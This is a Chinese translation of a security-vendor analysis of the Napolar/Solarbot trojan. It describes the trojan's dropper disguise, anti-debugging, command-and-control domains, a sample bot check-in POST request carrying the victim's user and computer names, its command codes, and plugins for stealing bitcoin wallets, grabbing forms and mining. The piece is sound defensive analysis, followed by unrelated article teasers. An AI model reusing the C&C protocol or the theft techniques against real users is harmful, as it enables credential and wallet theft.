Win32/64-Napolar 木马界的明星

在线体验各类最新模型,更有模型 免费Token 额度领取!
立即体验
简介: 在最近几个星期里的AVAST恶意样本分析名单中,Win32/64:Napolar拥有极高的文件和网络屏蔽率。另外,我们发现了被冠以Solarbot名称的新型木马于2013年5月左右开始做出其相关宣传广告,而这种广告并没有发布在大家经常访问的黑客论坛,而是在由主流搜索引擎索引的一个叫solarbot.net的网站,它拥有一个非常专业的外观设计。

在最近几个星期里的AVAST恶意样本分析名单中,Win32/64:Napolar拥有极高的文件和网络屏蔽率。另外,我们发现了被冠以Solarbot名称的新型木马于2013年5月左右开始做出其相关宣传广告,而这种广告并没有发布在大家经常访问的黑客论坛,而是在由主流搜索引擎索引的一个叫solarbot.net的网站,它拥有一个非常专业的外观设计。

image.png

对于Win32/64:Napolar木马,它的进程间通信管道名称是\\.\pipe\napSolar。再加上存在的类似“CHROME.DLL”、“OPERA.DLL”、“trusteer”、“data_inject”等字符串,以及后面会提到的功能特征,因此我们确定它和Solarbot间存在某种关联。让我们来看看下面的分析。


Dropper

该文件最初以自解压的压缩文件形式存在,以类似Photo_021-WWW.FACEBOOK.COM.exe这样的格式命名,并执行2项工作:静默执行dropper以及展示类似下面的辣妹照片(译者注:马赛克是人类文明进步最大的绊脚石):


作者的声明中宣称Solarbot由Free Pascal的Lazarus IDE所编写,但我们想不出任何专业或者商业性质的木马有此类似特点。从另一个角度来讲,我们不能确定该代码是否用Free Pascal编写的,因为它PE头部的许多信息都不同于一般的用Free Pascal编译的二进制文件。


核心可执行文件的结构如下:

image.png

x86初始的部分,同时也用于识别系统的体系结构。而在64位系统中,还有一个通信模块被解压和加载。LDE64(长度反汇编引擎)是一个32位基于BeaEngine下的官方工具,它能够进行32位和64位架构指令解码。对于系统函数的修改来说反汇编工作必不可少(确保成功的挂钩一个定制的或模拟的源代码块)。


如网站广告中提到的,KERNEL32.DLL、NTDLL.DLL、WININET.DLL、SHLWAPI.DLL、PASPI.DLL中的所有重要函数都进行了CRC32哈希处理(CRC32哈希常数表结构地址在0xFF395A)并将其储存在虚拟表单中。与IsDebuggerPresent、OutputDebugString函数相关的反调试技巧也在此有所体现。安装到%AppData\lsass.exe后,在新申请的内存空间0xFE0000处开始运行,之后bot会自行关闭,这意味着它不会在进程列表中被发现。

为了了解被这种木马感染的地区分布情况,我们分析了相关检测部分的运行状况。结果表明,每天至少有几百台计算机被感染,而这个数字相对于全部Solarbot样本来讲数量略多。受到感染影响最严重的区域为中南美的哥伦比亚、委内瑞拉、秘鲁、墨西哥、阿根廷以及亚洲的菲利宾、越南和欧洲的波兰。

image.png


通信协议

目前发现的C&C服务器有:xyz25.com、cmeef.info、paloshke.org。而后者注册于臭名昭著的Bizcn.com公司。我们曾在博客中提到的一款虚假修复工具即注册在这家具有欺诈性质的中国注册商下。广告站solarbot.net的注册信息如下:

Domain Name:SOLARBOT.NET

Registrar:NETEARTH ONE INC. D/B/A NETEARTH

Whois Server:whois.advancedregistrar.com

Referral URL:http://www.advancedregistrar.com

Name Server:NS1.BITCOIN-DNS.COM

Name Server:NS2.BITCOIN-DNS.COM

Status:clientTransferProhibited

Updated Date:01-aug-2013

Creation Date:01-aug-2013

Expiration Date:01-aug-2014

注册数据中联系信息被隐藏在PRIVACYPROTECT.ORG后面,它吸引了众多的涉及恶意活动的团体。

获取执行命令的HTTP POST请求如下所示:

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;

Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR

3.0.4506.2152; .NET CLR 3.5.30729)

Host: www.paloshke.org

Content-Length: 81

Pragma: no-cache

v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32

其中s字符表示一个从受害人环境获取的,随之生成的RC4解密密匙,v代表bot的版本,数字1.0表示这个bot的初始开发阶段。

在成功的请求了之后,会得到响应。就像我们所提到的那样,它是由RC4进行加密的,通过POST查询字段发送未加密的正确密钥。响应结构采用以0分割的字符串数组的形式。每个字符串开头使用一个字节来表示指令号码(已观察到15个不同的指令),再加上相应的字符串:在连接延迟(指令0xC)中是秒数(一般为3600);对于下载命令(指令0×12),是文件的URL地址、控制哈希以及一个解密密钥;0×2指令安装额外的文件WalletSteal.bin,一个比特币钱包的偷窃插件。根据bitcoin.org,比特币钱包就相当于比特币网络中的实体钱包,它包含有允许用户在比特币交易中使用的密钥。实际上,这就是之前说的关于插件支持的例子。插件加密放在%AppData中的临时目录SlrPlugin中。


特点

以下特点列表就是在网站上所展示的:

image.png

我们已看到FTP和POP3掠夺,反向Socks5或者基础功能模块的实现。有相关的字符串(“SSL”、“http://”、“https://”、web浏览器库的名字、“NSS layer”、“data_start”、“data_inject”、“data_end”)反映了从浏览器发起攻击的可能性。确实,我们发现网络银行论坛的内容以未加密的方法发送到C&C服务器上,但这仅在网站要求信誉或者证书验证时发生。这可能和以下内置的URL列表有关:

https://urs.microsoft.com/urs.asmx

http://ocsp.verisign.com

http://ocsp.comodoca.com

http://safebrowsing.clients.google.com

http://dirpop.naver.com:8088/search.naver

而后通过内部指令0xF进行远程更新。

接下来我们观察到,它下载了一个比特币挖掘机,并将其注入到系统临时目录的记事本文件中进行了执行(对应列表中的“MD5版本更新和系统下载”)。


最后,我们不得不说这个bot所展示的强悍的恶意能力,再加上$200的合理价格,近期很有可能大量涌现。幸运的是,针对此的反病毒软件将会应运而生,使这些网络犯罪种类更加的难以生存。


相关文章
|
3月前
|
人工智能 API Apache
31B 干掉 405B:Google Gemma 4,正在终结参数军备竞赛
一个 31B 参数的模型,在全球开源大模型排行榜上排名第三。它身前倒下的,是 Qwen 3.5 的 397B,是 Llama 的 405B。
685 2
|
Python Windows
Python实现常用办公文件格式转换
本文介绍了如何使用Python及其相关库(如`pandas`、`openpyxl`、`python-docx`等)实现办公文件格式间的转换,包括XLS转XLSX、DOC转DOCX、PPT转PPTX、Word转PDF及PDF转Word,并提供了具体代码示例和注意事项。
1098 89
|
机器学习/深度学习 人工智能 自然语言处理
指南:Grok中文版 _Grok 3 中文版本国内在线使用
Grok中文版都让用户能够不受限制地体验到最前沿的人工智能技术。通过这个平台,国内用户能够突破网络的束缚,尽情享受AI带来的便利与乐趣。
2837 4
|
开发者 UED
鸿蒙next版开发:ArkTS组件通用属性(悬浮态效果)
在HarmonyOS 5.0中,ArkTS引入了悬浮态效果的控制属性,使开发者能为组件添加鼠标悬浮时的视觉反馈,增强用户体验。本文详解了hoverEffect属性及其常见效果(Auto、Scale、Highlight、None),并提供了示例代码,展示了如何为按钮设置悬浮效果。通过这些属性,开发者可以实现更生动和互动的界面。
1602 1
|
缓存 弹性计算 应用服务中间件
阿里云服务器部署Jupyter私房菜
在阿里云ECS上,选用2核2G的配置,安装Ubuntu 22.04,然后部署Nginx作为Jupyter Notebook的反向代理。安装Miniconda3,配置清华TUNA镜像源以加速下载。创建Jupyter Notebook,设置密码和远程访问,通过Nginx配置实现安全访问。整个过程包括安装Jupyter,修改Nginx配置,最后通过浏览器访问 Notebook。
1273 0
阿里云服务器部署Jupyter私房菜
|
容器
Element el-container 布局容器组件详解
本文目录 1. 背景 2. 全局样式 3. 布局代码 4. 增加导航菜单 5. 小结
3542 0
Element el-container 布局容器组件详解
|
存储 人工智能
深度解析RAG大模型知识冲突,清华西湖大学港中文联合发布
【7月更文挑战第27天】清华大学、西湖大学与香港中文大学联合发布的论文深入探讨了RAG(Retrieval-Augmented Generation)大模型在处理信息时遇到的知识冲突问题及其解决方案。RAG模型通过结合预训练语言模型与外部知识库生成准确内容,但会面临上下文记忆、上下文间及内部记忆冲突。研究提出了基于上下文感知的记忆管理、多上下文推理及知识选择权衡等方法来缓解这些问题。尽管取得了进展,但在计算资源需求、解决方案效果验证及模型鲁棒性等方面仍有挑战待克服。[论文](https://arxiv.org/abs/2403.08319)
872 3
|
Python 数据采集 安全
淘宝商品评论数据爬取:Python实战指南
淘宝商品评论数据的自动爬取可以为市场分析和用户行为研究提供宝贵的信息资源。然而,这一过程需要严格遵守法律法规,尊重数据的版权和隐私。通过合理利用Python的网络爬虫技术,可以在遵循道德规范的前提下,高效地完成数据采集任务。 通过本文的指南,希望你能对淘宝商品评论数据的爬取有一个清晰的认识,并能够安全、合法地进行数据采集。
|
机器学习/深度学习 算法
m基于深度学习的QPSK调制解调系统频偏估计和补偿算法matlab仿真
MATLAB 2022a中展示了基于深度学习的QPSK调制解调系统频偏估计和补偿算法仿真结果。该算法运用神经网络模型实时估计并补偿无线通信中的频率偏移。QPSK调制将二进制信息映射到四个相位状态,解调通常采用相干解调。深度学习算法通过预处理、网络结构设计、损失函数选择和优化算法实现频偏估计。核心程序生成不同SNR下的信号,比较了有无频偏补偿的误码率,显示了补偿效果。
523 1
|
SQL 关系型数据库 MySQL
mysql5.7 慢查询配置 查看sql语句执行时间
mysql5.7 慢查询配置 查看sql语句执行时间
509 1